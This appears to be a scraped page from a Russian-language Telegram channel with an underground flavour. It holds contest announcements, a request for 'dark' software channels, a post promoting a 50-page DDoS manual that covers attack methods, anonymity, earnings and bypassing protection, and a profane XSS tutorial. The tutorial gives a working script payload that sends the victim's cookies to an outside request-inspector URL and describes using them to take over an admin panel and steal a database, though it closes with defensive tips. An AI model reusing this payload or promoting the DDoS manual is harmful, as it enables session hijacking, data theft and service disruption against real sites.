cookie

ما از کوکی‌ها برای بهبود تجربه مرور شما استفاده می‌کنیم. با کلیک کردن بر روی «پذیرش همه»، شما با استفاده از کوکی‌ها موافقت می‌کنید.

avatar

FG | MATRIX

🔜

نمایش بیشتر
پست‌های تبلیغاتی
477
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز

در حال بارگیری داده...

معدل نمو المشتركين

در حال بارگیری داده...

😁Своими словами опишите, информацию из гугла не будем засчитывать.
نمایش همه...
🔥 4👍 1🫡 1
👑Кто такой Кевин Митник? Опишите его навыки и историю личности боту. 🔤@FG_feedback_bot За самый креативный ответ мы предоставим возможность узнать новое из мира социальной инженерии. В пабликах вы такой информации никогда не найдёте. Игра началась 🤝
نمایش همه...
🤝 4🫡 2
👀
نمایش همه...
🤝 4🫡 1
نمایش همه...
FG | TRADE

✅⚡️Результаты конкурса 150$ ✅⚡️ Задание - t.me/FG_TRADE/457 ☄️1-е место: @junklz + 70$ ☄️2-е место: @reasontwo + 50$ ☄️3-е место: @lucky_12345_lucky + 30$ 4+ места и все кто принимал участие, вас ждут подарки в боте обратной связи (VIP, Courses, NFT) 📩@FG_feedback_bot Soon: 👀 150$➡️**** ♨️Живой пример - участники что показали топовые результаты, вознаграждаются $ и лояльными условиями сотрудничества.В следующий раз мы увеличим призовой пул вознаграждений, но задачи будут куда более интересными💻.

🫡 4
Repost from FG | TRADE
🎇Сегодня итоги и апдейты. 🤝
نمایش همه...
❤‍🔥 5🤝 1
Схемные каналы тоже подойдут. Так же мнение ваше по каналам опишите, насколько они норм. Неправильных ответов нет. Никто спортиков за плохой ответ отправлять не собирается 🤣 🤝 🪵
نمایش همه...
🫡 4👍 1
🤙Всем здорова, дайте хорошие каналы в бота. Софт дарк тематики. Задание дает +20 social credit для первого взноса на кошкажену. Если каналы действительно годные получите доп плюшки. 💬Сюда писать: @FG_feedback_bot
نمایش همه...
🤝 4🫡 1
نمایش همه...
FG | TRADE

🤑Новый призовой конкурс, для самых быстрых, внимательных и любителей развиваться, получать новый опыт в крипте и ресёрче!🤩 🤑Призовой фонд - 150$, следующий в 5х больше будет! 1-е место: 70$ 2-е место: 50$ 3-е место: 30$ Условия задания! Нужно выполнять строго ТЗ (техническому заданию) и включить креативность и инициативу 🔠 Включаем уведомления, вечером выйдет полная информация. Задания вам знакомы и они очень простые.

🤝 5🫡 1
💀💀50cтраниц про ддос.💀💀 Мануал на достаточно трудном языке - нужно или перечитывать или гуглить, но все, что нужно тут есть. Много теории, настройки, скриптов. Много сказано про методы, софты и серваки, под конец неплохая инф про анонимность, заработок и обход защиты. Я даже пару раз хорошо поржал. ⚫️⚫️⚫️⚫️ ⚫️ ⚫️ ⚫️ https://t.me/FG_FAQ_FG/95 ⚫️ ⚫️ ⚫️⚫️⚫️⚫️⚫️⚫️⚫️ 💬 GANG CHAT \ ⚙️GUIDE ECOSYSTEM \ 🗂ADDLIST \ 🔥LVL 2 \
نمایش همه...

🔥 8👍 3🫡 2
💥XSS ИЛИ КАК СПИЗДЕТЬ КУКИ АДМИНА Ну че вы? Как дела? Седня будем разбираться с ахуительной ошибкой которая есть у всех новичков и самоучек. Веб разработчики готовимся Не буду ебать вам мозг высерами из википедии объясню на простом примере: У нас есть Димон - фронтендер и дядя Миша - заказчик Дядя Миша говорит Димону: -Бля, захуяч ка мне панельку с отзывами, хочу знач чтоб клиенты могли писать что у меня лучший автосервис -Ok, boss Ну и естстественно димон делает всё наотъебись и идёт спать. И тут появляется Дартаньян, ахуенный хакер, решивший спиздеть бд дяди Миши. Заходит знач он на сайт и видит строку с отзывами. В следующую секунду там появляется вот такой вот текст: <script> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </script> Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу. Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице. В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией. Окей, а как избежать подобной хуйни? 👉Добавляем CSP header. Например: Content-Security-Policy: script-src 'self' Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/ 👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог)) 👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код: <script>alert('XSS');</script> Есть отстук? Знач нашли уязвимость. Пиздуем фиксить 👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ ) 💬 GANG CHAT \ ⚙️GUIDE ECOSYSTEM \ 🗂ADDLIST \ 🔥LVL 2 \
نمایش همه...

8🤝 1